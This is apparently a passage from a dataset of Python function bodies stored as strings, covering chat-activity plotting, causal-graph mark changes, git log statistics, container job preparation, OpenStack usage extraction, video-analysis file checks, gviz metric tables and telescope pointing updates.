for plotting purposes\n for entry in streamer_messeges_data:\n timearr.append(entry['start_time'])\n messagesarr.append(entry['messeges_count'] * entry['messeges_count'])\n #print(entry['start_time'])\n\n #create time and chatters array for plotting purposes\n for entry in streamer_data:\n streamer_timearr.append(entry['deltatime_from_start_of_clip'])\n num_chattersarr.append(entry['num_viewers'])\n\n # print('start time: ' + str(timearr[0]))\n # print('end time: ' + str(timearr[-1]))\n # print('duration: ' + str(timearr[-1] - timearr[0]))\n # print('average views/min = ' + str(sum(messagesarr) / len(messagesarr)))\n\n average_message_count = sum(messagesarr) / len(messagesarr)\n\n averagearr = []\n plotting_time_arr = []\n labelarr = []\n\n for i in range(len(timearr)):\n averagearr.append(average_message_count*1.8)\n #print(str(timearr[i]) + ' converts to ' + str(datetime.datetime(2020, 1, 1, 0, 0) + timearr[i]))\n plotting_time_arr.append(datetime.datetime(2020, 1, 1, 0, 0) + timearr[i])\n labelarr.append(str(i))\n\n plotting_streamer_timearr = []\n for i in range(len(streamer_timearr)):\n plotting_streamer_timearr.append(datetime.datetime(2020, 1, 1, 0, 0) + streamer_timearr[i])\n\n #plot messages and cuttoff\n messeges_over_time_fig = pyplot.figure(1)\n messeges_over_time_fig.set_figheight(15)\n messeges_over_time_fig.set_figwidth(30)\n messeges_over_time_fig.suptitle(self.streamer + \"'s video data\")\n messeges_over_time_sub = messeges_over_time_fig.add_subplot(211)\n\n pyplot.plot(plotting_time_arr,messagesarr,label='messages/min')\n dots = pyplot.plot(plotting_time_arr,messagesarr,'bo',label='messages/min')\n\n #label dots\n count = 0\n last_entry_was_above_line = False\n for i in range(len(plotting_time_arr)):\n #print(str(count) +': comparing ' + str(messagesarr[i]) + ' with ' + str(averagearr[i]))\n if(messagesarr[i] > averagearr[i]):\n if(last_entry_was_above_line):\n #Don't increment the count because this is part of the same clip\n count = count\n else:\n #new clip above the line, increment clip count\n count = count + 1\n messeges_over_time_sub.annotate(count,xy=(plotting_time_arr[i],messagesarr[i]))\n last_entry_was_above_line = True\n else:\n last_entry_was_above_line = False\n # messeges_over_time_sub.annotate('NA',xy=(plotting_time_arr[i],messagesarr[i]))\n\n #finish plotting\n pyplot.plot(plotting_time_arr, averagearr,'',label='average')\n pyplot.gcf().autofmt_xdate()\n pyplot.ylabel('Messeges*Messeges')\n pyplot.xlabel('Time')\n\n viewers_over_time_sub = messeges_over_time_fig.add_subplot(212)\n\n pyplot.plot(plotting_streamer_timearr,num_chattersarr,label='num chatters')\n pyplot.ylabel('Chatters')\n pyplot.xlabel('Time')\n\n pyplot.tight_layout()\n pyplot.savefig(output_file_location+self.streamer+'.png')\n print('saved chart to ' + output_file_location+self.streamer+'.png')\n # pyplot.show()\n return average_message_count, streamer_messeges_data", "def legitimate_mark_changes(self, verbose=False):\n if self._undirected:\n raise ValueError('Only defined for DMAGs')\n\n disc_paths = self.discriminating_paths()\n\n mark_changes_dir = set()\n for i, j in self._directed:\n if verbose: print(f'{i}->{j} => {i}<->{j} ?')\n # FIRST CONDITIONS\n parents_condition = all(self.has_directed(parent, j) for parent in self._parents[i])\n if not parents_condition:\n if verbose: print('Failed parents condition')\n continue\n spouses_condition = all(self.has_any_edge(spouse, j) for spouse in self._spouses[i])\n if not spouses_condition:\n if verbose: print('Failed spouses condition')\n continue\n\n # SECOND CONDITION\n disc_paths_for_i = [path for path in disc_paths.keys() if path[-2] == i]\n disc_paths_condition = all(path[-1] != j for path in disc_paths_for_i)\n if not disc_paths_condition:\n if verbose: print('Failed discriminating path condition')\n continue\n\n # FINAL CONDITION\n if i in self.ancestors_of(j, exclude_arcs={(i, j)}):\n if verbose: print('Failed ancestral condition')\n continue\n\n if verbose: print('Passed')\n mark_changes_dir.add((i, j))\n\n mark_changes_bidir = set()\n for i, j in self._bidirected | set(map(reversed, self._bidirected)):\n if verbose: print(f'{i}<->{j} => {i}->{j} ?')\n # FIRST CONDITIONS\n parents_condition = all(self.has_directed(parent, j) for parent in self._parents[i])\n if not parents_condition:\n if verbose: print('Failed parents condition')\n continue\n spouses_condition = all(self.has_any_edge(spouse, j) for spouse in self._spouses[i] if spouse != j)\n if not spouses_condition:\n if verbose: print('Failed spouses condition')\n continue\n\n # SECOND CONDITION\n disc_paths_for_i = [path for path in disc_paths.keys() if path[-2] == i]\n disc_paths_condition = all(path[-1] != j for path in disc_paths_for_i)\n if not disc_paths_condition:\n if verbose: print('Failed discriminating path condition')\n continue\n\n # FINAL CONDITION\n if i in self.ancestors_of(j):\n if verbose: print('Failed ancestral condition')\n continue\n\n if verbose: print('Passed')\n mark_changes_bidir.add((i, j))\n\n return mark_changes_dir, mark_changes_bidir", "def deal_lines(self, lines, conf):\n if lines == ['']:\n print \"NO new %s commit!\" % conf\n else:\n for line in lines:\n if re.search('\\d+ files? changed', line) is None:\n pos = line.find(' ')\n if pos != -1:\n try:\n parts = line.split(' ', 2)\n commit_id = parts[0]\n self.current_commit = commit_id\n stamp = int(parts[1])\n ti = datetime.datetime.fromtimestamp(float(stamp))\n s_time = datetime.datetime.fromtimestamp(float(0))\n if self.start_date == s_time:\n self.start_date = ti\n elif self.start_date > ti:\n self.start_date = ti\n author, mail = parts[2].split('<', 1)\n message = mail.split('> ', 1)[1]\n mail = mail.split('>', 1)[0]\n if re.search(': ', message) is not None:\n messagetype = message.split(': ', 1)[0]\n if messagetype not in CLASSIFICATION:\n messagetype = 'OTR'\n else:\n messagetype = 'OTR'\n if commit_id not in self.commit_dictionary:\n self.commit_dictionary[commit_id]\\\n = [commit_id, mail,\n stamp, messagetype,\n messagetype, 0, 0, 0, 0]\n # [files, inserted, deleted, total_lines]\n if mail not in self.author_dictionary:\n self.author_dictionary[mail] = [author,\n mail, 0, 0,\n 0, 0, 1,\n stamp]\n # [files,inserted,deleted,total_lines,commit,stamp]\n else:\n self.author_dictionary[mail][6] += 1\n if stamp > self.author_dictionary[mail][7]:\n self.author_dictionary[mail][7] = stamp\n self.total_patches += 1\n except:\n print 'Warning: unexpected line \"%s\"' % line\n else:\n if conf == 'no_merges':\n try:\n commit_id = self.current_commit\n numbers = self.getstatsummarycounts(line)\n if len(numbers) == 3:\n (files, inserted, deleted) = \\\n map(lambda el: int(el), numbers)\n total_lines = inserted - deleted\n self.commit_dictionary[commit_id][5] = files\n self.commit_dictionary[commit_id][6] = inserted\n self.commit_dictionary[commit_id][7] = deleted\n self.commit_dictionary[commit_id][8] = total_lines\n self.author_dictionary[mail][2] += files\n self.author_dictionary[mail][3] += inserted\n self.author_dictionary[mail][4] += deleted\n self.author_dictionary[mail][5] += total_lines\n self.total_lines_inserted += inserted\n self.total_lines_deleted += deleted\n self.total_lines += total_lines\n self.current_commit = None\n except:\n print 'Warning: unexpected line \"%s\"' % line", "def _transition_from_PREPARING(self, run_state):\n\n def mount_dependency(dependency, shared_file_system):\n if not shared_file_system:\n # Set up symlinks for the content at dependency path\n Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)\n os.symlink(dependency.docker_path, dependency.child_path)\n # The following will be converted into a Docker volume binding like:\n # dependency_path:docker_dependency_path:ro\n docker_dependencies.append((dependency.parent_path, dependency.docker_path))\n\n if run_state.is_killed or run_state.is_restaged:\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=f'the bundle was {\"killed\" if run_state.is_killed else \"restaged\"}',\n )\n return run_state._replace(stage=RunStage.CLEANING_UP)\n\n # Check CPU and GPU availability\n try:\n cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(\n run_state.resources.cpus, run_state.resources.gpus\n )\n except Exception as e:\n message = \"Unexpectedly unable to assign enough resources to bundle {}: {}\".format(\n run_state.bundle.uuid, str(e)\n )\n logger.error(message)\n logger.error(traceback.format_exc())\n return run_state._replace(run_status=message)\n\n dependencies_ready = True\n status_messages = []\n dependency_keys_to_paths: Dict[DependencyKey, str] = dict()\n\n if not self.shared_file_system:\n # No need to download dependencies if we're in the shared FS,\n # since they're already in our FS\n for dep in run_state.bundle.dependencies:\n dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)\n\n try:\n # Fetching dependencies from the Dependency Manager can fail.\n # Just update the download status on the next iteration of this transition function.\n dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)\n dependency_keys_to_paths[dep_key] = os.path.join(\n self.dependency_manager.dependencies_dir, dependency_state.path\n )\n except Exception:\n status_messages.append(f'Downloading dependency {dep.child_path} failed')\n dependencies_ready = False\n continue\n\n if dependency_state.stage == DependencyStage.DOWNLOADING:\n status_messages.append(\n 'Downloading dependency %s: %s done (archived size)'\n % (dep.child_path, size_str(dependency_state.size_bytes))\n )\n dependencies_ready = False\n elif dependency_state.stage == DependencyStage.FAILED:\n # Failed to download dependency; -> CLEANING_UP\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=f'Dependency has failed for this bundle. Dependency child uuid: {dep.child_uuid}. Dependency child path: {dep.child_path}',\n )\n return run_state._replace(\n stage=RunStage.CLEANING_UP,\n failure_message='Failed to download dependency %s: %s'\n % (dep.child_path, dependency_state.message),\n )\n\n # get the docker image\n docker_image = run_state.resources.docker_image\n image_state = self.image_manager.get(docker_image)\n if image_state.stage == DependencyStage.DOWNLOADING:\n status_messages.append(\n 'Pulling docker image %s. %s' % (docker_image, image_state.message)\n )\n dependencies_ready = False\n elif image_state.stage == DependencyStage.FAILED:\n # Failed to pull image; -> CLEANING_UP\n message = 'Failed to download Docker image: %s' % image_state.message\n logger.error(message)\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n\n # stop proceeding if dependency and image downloads aren't all done\n if not dependencies_ready:\n status_message = status_messages.pop()\n if status_messages:\n status_message += \"(and downloading %d other dependencies and docker images)\" % len(\n status_messages\n )\n logger.info(\n f'bundle is not ready yet. uuid: {run_state.bundle.uuid}. status message: {status_message}'\n )\n return run_state._replace(run_status=status_message)\n\n # All dependencies ready! Set up directories, symlinks and container. Start container.\n # 1) Set up a directory to store the bundle.\n if self.shared_file_system:\n if not os.path.exists(run_state.bundle_path):\n if run_state.bundle_dir_wait_num_tries == 0:\n message = (\n \"Bundle directory cannot be found on the shared filesystem. \"\n \"Please ensure the shared filesystem between the server and \"\n \"your worker is mounted properly or contact your administrators.\"\n )\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=\"Bundle directory cannot be found on the shared filesystem.\",\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n next_bundle_dir_wait_num_tries = run_state.bundle_dir_wait_num_tries - 1\n logger.info(\n f'Waiting for bundle directory to be created by the server, uuid: {run_state.bundle.uuid}, bundle_dir_wait_num_tries: {next_bundle_dir_wait_num_tries}'\n )\n return run_state._replace(\n run_status=\"Waiting for bundle directory to be created by the server\",\n bundle_dir_wait_num_tries=next_bundle_dir_wait_num_tries,\n )\n else:\n os.makedirs(run_state.bundle_path, exist_ok=True)\n\n # 2) Set up symlinks\n docker_dependencies = []\n docker_dependencies_path = (\n RunStateMachine._ROOT\n + run_state.bundle.uuid\n + ('_dependencies' if not self.shared_file_system else '')\n )\n\n for dep in run_state.bundle.dependencies:\n full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))\n to_mount = []\n if self.shared_file_system:\n # TODO(Ashwin): make this not fs-specific.\n # On a shared FS, we know where the dependency is stored and can get the contents directly\n dependency_path = os.path.realpath(os.path.join(dep.location, dep.parent_path))\n else:\n dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)\n dependency_path = dependency_keys_to_paths[dep_key]\n\n if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:\n # Mount all the content of the dependency_path to the top-level of the bundle\n for child in os.listdir(dependency_path):\n child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))\n to_mount.append(\n DependencyToMount(\n docker_path=os.path.join(docker_dependencies_path, child),\n child_path=child_path,\n parent_path=os.path.join(dependency_path, child),\n )\n )\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [child_path]\n )\n else:\n to_mount.append(\n DependencyToMount(\n docker_path=os.path.join(docker_dependencies_path, dep.child_path),\n child_path=full_child_path,\n parent_path=dependency_path,\n )\n )\n\n first_element_of_path = Path(dep.child_path).parts[0]\n if first_element_of_path == RunStateMachine._ROOT:\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [full_child_path]\n )\n else:\n # child_path can be a nested path, so later remove everything from the first element of the path\n path_to_remove = os.path.join(run_state.bundle_path, first_element_of_path)\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [path_to_remove]\n )\n for dependency in to_mount:\n try:\n mount_dependency(dependency, self.shared_file_system)\n except OSError as e:\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=str(e.__class__),\n level=logging.ERROR,\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))\n\n if run_state.resources.network:\n docker_network = self.docker_network_external.name\n else:\n docker_network = self.docker_network_internal.name\n\n # 3) Start container\n try:\n container_id = self.bundle_runtime.start_bundle_container(\n run_state.bundle_path,\n run_state.bundle.uuid,\n docker_dependencies,\n run_state.bundle.command,\n run_state.resources.docker_image,\n network=docker_network,\n cpuset=cpuset,\n gpuset=gpuset,\n request_cpus=run_state.resources.cpus,\n request_gpus=run_state.resources.gpus,\n memory_bytes=run_state.resources.memory,\n runtime=self.docker_runtime,\n shared_memory_size_gb=self.shared_memory_size_gb,\n )\n self.worker_docker_network.connect(container_id)\n except DockerUserErrorException as e:\n message = 'Cannot start Docker container: {}'.format(e)\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason='Cannot start Docker container.',\n level=logging.ERROR,\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n except Exception as e:\n message = 'Cannot start container: {}'.format(e)\n logger.error(message)\n logger.error(traceback.format_exc())\n raise\n\n return run_state._replace(\n stage=RunStage.RUNNING,\n run_status='Running job in container.',\n container_id=container_id,\n container=None,\n docker_image=image_state.digest,\n has_contents=True,\n cpuset=cpuset,\n gpuset=gpuset,\n )", "def extract(self, extract_from, extract_to):\n # Some API calls do not expect a TZ, so we have to remove the timezone\n # from the dates. We assume that all dates coming from upstream are\n # in UTC TZ.\n extract_from = extract_from.replace(tzinfo=None)\n extract_to = extract_to.replace(tzinfo=None)\n\n # Our records\n self.records = {}\n self.acc_records = {}\n\n # We cannot use just 'changes-since' in the servers.list() API query,\n # as it will only include servers that have changed its status after\n # that date. However we cannot just get all the usages and then query\n # server by server, as deleted servers are not returned by the usages\n # call. Moreover, Nova resets the start_time after performing some\n # actions on the server (rebuild, resize, rescue). If we use that time,\n # we may get a drop in the wall time, as a server that has been resized\n # in the middle of its lifetime will suddenly change its start_time\n #\n # Therefore, what we do is the following (hackish approach)\n #\n # 1.- List all the servers that changed its status after the start time\n # for the reporting period\n # 2.- Build the records for the period [start, end] using those servers\n # 3.- Get all the usages, being aware that the start time may be wrong\n # 4.- Iter over the usages and:\n # 4.1.- get information for servers that are not returned by the query\n # in (1), for instance servers that have not changed it status.\n # We build then the records for those severs\n # 4.2.- For all the servers, adjust the CPU, memory and disk resources\n # as the flavor may not exist, but we can get those resources\n # from the usages API.\n\n # Lets start\n\n # 1.- List all the deleted servers from that period.\n servers = self._get_servers(extract_from)\n # 2.- Build the records for the period. Drop servers outside the period\n # (we do this manually as we cannot limit the query to a period, only\n # changes after start date).\n self._process_servers_for_period(servers, extract_from, extract_to)\n\n # 3.- Get all the usages for the period\n usages = self._get_usages(extract_from, extract_to)\n # 4.- Iter over the results and\n # This one will also generate accelerator records if GPU flavors\n # are found.\n self._process_usages_for_period(usages, extract_from, extract_to)\n\n return list(self.records.values()) + list(self.acc_records.values())", "def errorChecks(self):\n stop_calculation = False\n found_error = False\n errors = {\"Info\": [], \"Critical\": []}\n error_types = []\n ori_images = 0\n of_images = 0\n depth_images = 0\n back_of_images = 0\n\n if os.path.exists(self.savePathJoin(\"Images\")):\n ori_images = len(\n listDirectory(self.savePathJoin(\"Images\"), extension=\"png\")\n )\n # Check image folder\n if self.img_exist and not os.path.exists(self.savePathJoin(\"Images\")):\n if os.path.exists(self.user[\"Video\"]):\n errors[\"Info\"].append(\n \"Images folder {0} doesn't exist -> Recreate it and recalculate optical flow and depth estimations\".format(\n self.savePathJoin(\"Images\")\n )\n )\n error_types.append(\"NoImages\")\n else:\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n )\n )\n elif self.img_exist and os.path.exists(self.user[\"Video\"]):\n errors[\"Info\"].append(\n \"Both the video {0} and Images folder {1} exist -> using Images folder by default\".format(\n self.user[\"Video\"], self.savePathJoin(\"Images\")\n )\n )\n elif not self.img_exist and not os.path.isfile(self.user[\"Video\"]):\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n )\n )\n\n # Check video file\n if self.user[\"Video\"] != \"\" and not os.path.isfile(self.user[\"Video\"]):\n if os.path.exists(self.savePathJoin(\"Images\")):\n errors[\"Info\"].append(\n (\n \"Video file {0} doesn't exist -> Using images in the Images folder instead\".format(\n self.user[\"Video\"]\n )\n )\n )\n else:\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n )\n )\n elif os.path.isfile(self.user[\"Video\"]) and os.path.exists(\n self.savePathJoin(\"Images\")\n ):\n pass\n\n # Check optical flow\n if self.of_exist and not os.path.exists(self.savePathJoin(\"Of\")):\n errors[\"Info\"].append(\n (\n \"Optical flow folder {0} doesn't exist -> Recalculating optical flow\".format(\n self.savePathJoin(\"Of\")\n )\n )\n )\n error_types.append(\"NoOf\")\n elif self.of_exist:\n of_images = len(listDirectory(self.savePathJoin(\"Of\"), extension=\"png\"))\n if of_images != ori_images - 1 and ori_images != 0:\n errors[\"Info\"].append(\n (\n \"Optical flow image number {0} doesn't match video image number {1} - 1 -> Recalculating optical flow\".format(\n of_images, ori_images\n )\n )\n )\n error_types.append(\"NoOf\")\n\n # Check backward optical flow\n if self.back_of_exist and not os.path.exists(self.savePathJoin(\"Back_Of\")):\n errors[\"Info\"].append(\n (\n \"Backward optical flow folder {0} doesn't exist -> Recalculating backward optical flow\".format(\n self.savePathJoin(\"Back_Of\")\n )\n )\n )\n error_types.append(\"NoOf\")\n elif self.back_of_exist:\n back_of_images = len(\n listDirectory(self.savePathJoin(\"Back_Of\"), extension=\"png\")\n )\n if back_of_images != of_images:\n errors[\"Info\"].append(\n (\n \"Backward optical flow image number {0} doesn't match optical flow image number {1} -> Recalculating backward optical flow\".format(\n back_of_images, of_images\n )\n )\n )\n error_types.append(\"NoOf\")\n\n # Check depth estimation\n if self.depth_exist and not os.path.exists(self.savePathJoin(\"Depth\")):\n errors[\"Info\"].append(\n (\n \"Depth folder {0} doesn't exist -> Recalculating depth\".format(\n self.savePathJoin(\"Depth\")\n )\n )\n )\n error_types.append(\"NoDepth\")\n elif self.depth_exist:\n depth_images = len(\n listDirectory(self.savePathJoin(\"Depth\"), extension=\"png\")\n )\n if depth_images != ori_images and ori_images != 0:\n errors[\"Info\"].append(\n (\n \"Depth image number {0} doesn't match video image number {1} -> Recalculating depth\".format(\n depth_images, ori_images\n )\n )\n )\n error_types.append(\"NoDepth\")\n\n # Check ground truth\n if self.gt_exist and not os.path.isfile(self.user[\"GT\"]):\n errors[\"Info\"].append(\n (\n \"Ground Truth file {0} doesn't exist -> File won't be used\".format(\n self.user[\"GT\"]\n )\n )\n )\n error_types.append(\"NoGT\")\n\n # Check super pixel labels\n if (\n self.super_pixel_method != \"\"\n and os.path.exists(\n os.path.join(self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method)\n )\n and ori_images != 0\n and len(\n listDirectory(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method\n ),\n extension=\".npy\",\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n (\n \"Super pixel label number {0} doesn't match image number {1} -> Recalculating super pixel labels\".format(\n len(\n listDirectory(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"),\n self.super_pixel_method,\n ),\n extension=\".npy\",\n )\n ),\n ori_images,\n )\n )\n )\n error_types.append(\"LabelError\")\n\n # Check object detection\n if self.ui.c_object_detection.isChecked() and os.path.exists(\n self.savePathJoin(\"ObjectDetection\")\n ):\n if (\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".png\"\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n \"Object Detection image number {0} doesn't match image number of video {1} -> Recalculating object detection\".format(\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".png\"\n )\n ),\n ori_images,\n )\n )\n error_types.append(\"ObDetError\")\n elif (\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".npy\"\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n \"Object Detection numpy array number {0} doesn't match image number of video {1} -> Recalculating object detection\".format(\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".npy\"\n )\n ),\n ori_images,\n )\n )\n error_types.append(\"ObDetError\")\n\n answer = \"\"\n if len(errors[\"Info\"]) > 0 and len(errors[\"Critical\"]) == 0:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\n \"Some calculations might not run the way you expect them.\\nIn show details check the right side of the arrows to see what will happen.\"\n )\n msg.setWindowTitle(\"Information\")\n all_info = \"\"\n for info in errors[\"Info\"]:\n all_info += info + \"\\n\\n\"\n msg.setDetailedText(all_info)\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Abort)\n answer = msg.exec_()\n elif len(errors[\"Critical\"]) > 0:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\n \"Found critical error\\nCouldn't start run, see show details for more information\"\n )\n msg.setWindowTitle(\"Critical Error\")\n all_info = \"\"\n for info in errors[\"Critical\"]:\n all_info += info + \"\\n\"\n msg.setDetailedText(all_info)\n msg.setStandardButtons(QMessageBox.Abort)\n answer = msg.exec_()\n\n if answer != int(\"0x00040000\", 16):\n for ty in error_types:\n logging.info(\"Solve error: {0}\".format(ty))\n if ty == \"NoImage\":\n self.img_exist = False\n self.of_exist = False\n self.back_of_exist = False\n self.depth_exist = False\n elif ty == \"NoOf\":\n self.of_exist = False\n self.back_of_exist = False\n elif ty == \"NoDepth\":\n self.depth_exist = False\n elif ty == \"NoGT\":\n self.gt_exist = False\n self.user[\"GT\"] = \"\"\n elif ty == \"LabelError\":\n self.create_super_pixel_label = True\n shutil.rmtree(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method\n )\n )\n elif ty == \"ObDetError\":\n self.object_detection_dir_exist = False\n shutil.rmtree(self.savePathJoin(\"ObjectDetection\"))\n\n return answer == int(\"0x00040000\", 16) or stop_calculation", "def HandleFiles(variables):\n\n # The template file is the html file into which we will write the\n # data from the stats file, formatted correctly for the gviz_api.\n template_file = open(variables[1], \"r\")\n page_template = template_file.read()\n template_file.close()\n\n # This is the path match pattern for finding stats files amongst\n # all the other files it could be. eg: *.stt\n file_pattern = variables[2]\n\n # This is the directory with files that we will use to do the comparison\n # against.\n baseline_dir = variables[3]\n snrs = ''\n filestable = {}\n filestable['dsnr'] = ''\n filestable['drate'] = ''\n filestable['avg'] = ''\n\n # Go through each metric in the list.\n for column in range(1,2):\n\n # Dirs is directories after the baseline to compare to the base.\n dirs = variables[4:len(variables)]\n\n # Find the metric files in the baseline directory.\n dir_list = sorted(fnmatch.filter(os.listdir(baseline_dir), file_pattern))\n\n for metric in ['avg','dsnr','drate']:\n description = {\"file\": (\"string\", \"File\")}\n\n # Go through each directory and add a column header to our description.\n countoverall = {}\n sumoverall = {}\n\n for directory in dirs:\n description[directory] = (\"number\", directory)\n countoverall[directory] = 0\n sumoverall[directory] = 0\n\n # Data holds the data for the visualization, name given comes from\n # gviz_api sample code.\n data = []\n for filename in dir_list:\n row = {'file': splitext(basename(filename))[0] }\n baseline_file_name = baseline_dir + \"/\" + filename\n\n # Read the metric file from each of the directories in our list.\n for directory in dirs:\n metric_file_name = directory + \"/\" + filename\n\n # If there is a metric file in the current directory, open it\n # and calculate its overall difference between it and the baseline\n # directory's metric file.\n if os.path.isfile(metric_file_name):\n overall = FileBetter(baseline_file_name, metric_file_name,\n column, metric)\n row[directory] = overall\n\n sumoverall[directory] += overall\n countoverall[directory] += 1\n\n data.append(row)\n\n # Add the overall numbers.\n row = {\"file\": \"OVERALL\" }\n if countoverall[directory]:\n for directory in dirs:\n row[directory] = sumoverall[directory] / countoverall[directory]\n data.append(row)\n\n # write the tables out\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n\n filestable[metric] = ( filestable[metric] + \"filestable_\" + metric +\n \"[\" + str(column) + \"]=\" + data_table.ToJSon()\n + \"\\n\" )\n\n filestable_avg = filestable['avg']\n filestable_dpsnr = filestable['dsnr']\n filestable_drate = filestable['drate']\n\n # Now we collect all the data for all the graphs. First the column\n # headers which will be Datarate and then each directory.\n columns = (\"datarate\",baseline_dir)\n description = {\"datarate\":(\"number\", \"Datarate\")}\n for directory in dirs:\n description[directory] = (\"number\", directory)\n\n description[baseline_dir] = (\"number\", baseline_dir)\n\n snrs = snrs + \"snrs[\" + str(column) + \"] = [\"\n\n # Now collect the data for the graphs, file by file.\n for filename in dir_list:\n\n data = []\n\n # Collect the file in each directory and store all of its metrics\n # in the associated gviz metrics table.\n all_dirs = dirs + [baseline_dir]\n for directory in all_dirs:\n\n metric_file_name = directory + \"/\" + filename\n if not os.path.isfile(metric_file_name):\n continue\n\n # Read and parse the metrics file storing it to the data we'll\n # use for the gviz_api.Datatable.\n metrics = ParseMetricFile(metric_file_name, column)\n for bitrate, metric in metrics:\n data.append({\"datarate\": bitrate, directory: metric})\n\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n snrs = snrs + \"'\" + data_table.ToJSon(\n columns_order=tuple([\"datarate\",baseline_dir]+dirs)) + \"',\"\n\n snrs = snrs + \"]\\n\"\n\n formatters = \"\"\n for i in range(len(dirs)):\n formatters = \"%s formatter.format(better, %d);\" % (formatters, i+1)\n\n print FillForm(page_template, vars())\n return", "def nonsidereal_pointing_updates(self):\n obs = np.array(self.info['ObservationID'])\n all_date_obs = np.array(self.info['date_obs'])\n all_time_obs = np.array(self.info['time_obs'])\n all_exposure = np.array(self.info['exposure'])\n all_apertures = np.array(self.info['aperture'])\n tracking = np.array(self.info['Tracking'])\n targs = np.array(self.info['TargetID'])\n inst = np.array(self.info['Instrument'])\n ra_from_pointing_file = np.array(self.info['ra'])\n dec_from_pointing_file = np.array(self.info['dec'])\n nonsidereal_index = np.where(np.array(tracking) == 'non-sidereal')\n all_nonsidereal_targs = targs[nonsidereal_index]\n all_nonsidereal_instruments = inst[nonsidereal_index]\n\n # Get a list of the unique (target, instrument) combinations for\n # non-sidereal observations\n inst_targs = [[t, i] for t, i in zip(all_nonsidereal_targs, all_nonsidereal_instruments)]\n ctr = Counter(tuple(x) for x in inst_targs)\n unique = [list(key) for key in ctr.keys()]\n\n # Check that all non-sidereal targets have catalogs associated with them\n #for targ, inst in zip(nonsidereal_targs, nonsidereal_instruments):\n for element in unique:\n targ, inst = element\n\n # Skip unsupported instruments\n if inst in ['NIRSpec', 'MIRI']:\n continue\n\n ns_catalog = get_nonsidereal_catalog_name(self.catalogs, targ, inst)\n catalog_table, pos_in_xy, vel_in_xy = read_nonsidereal_catalog(ns_catalog)\n\n # If the ephemeris_file column is present but equal to 'none', then\n # remove the column\n if 'ephemeris_file' in catalog_table.colnames:\n if catalog_table['ephemeris_file'][0].lower() == 'none':\n catalog_table.remove_column('ephemeris_file')\n\n if 'ephemeris_file' in catalog_table.colnames:\n ephemeris_file = catalog_table['ephemeris_file'][0]\n ra_ephem, dec_ephem = ephemeris_tools.get_ephemeris(ephemeris_file)\n\n # Find the observations that use this target\n exp_index_this_target = targs == targ\n obs_this_target = np.unique(obs[exp_index_this_target])\n\n # Loop over observations\n for obs_name in obs_this_target:\n\n # Get date/time for every exposure\n obs_exp_indexes = np.where(obs == obs_name)\n obs_dates = all_date_obs[obs_exp_indexes]\n obs_times = all_time_obs[obs_exp_indexes]\n exposures = all_exposure[obs_exp_indexes]\n apertures = all_apertures[obs_exp_indexes]\n unique_apertures = np.unique(apertures)\n\n start_dates = []\n for date_obs, time_obs in zip(obs_dates, obs_times):\n ob_time = '{}T{}'.format(date_obs, time_obs)\n try:\n start_dates.append(datetime.datetime.strptime(ob_time, '%Y-%m-%dT%H:%M:%S'))\n except ValueError:\n start_dates.append(datetime.datetime.strptime(ob_time, '%Y-%m-%dT%H:%M:%S.%f'))\n\n if 'ephemeris_file' in catalog_table.colnames:\n all_times = [ephemeris_tools.to_timestamp(elem) for elem in start_dates]\n\n # Create list of positions for all frames\n try:\n ra_target = ra_ephem(all_times)\n dec_target = dec_ephem(all_times)\n\n except ValueError:\n raise ValueError((\"Observation dates ({} - {}) are not present within the ephemeris file {}\"\n .format(start_dates[0], start_dates[-1], ephemeris_file)))\n else:\n if not pos_in_xy:\n # Here we 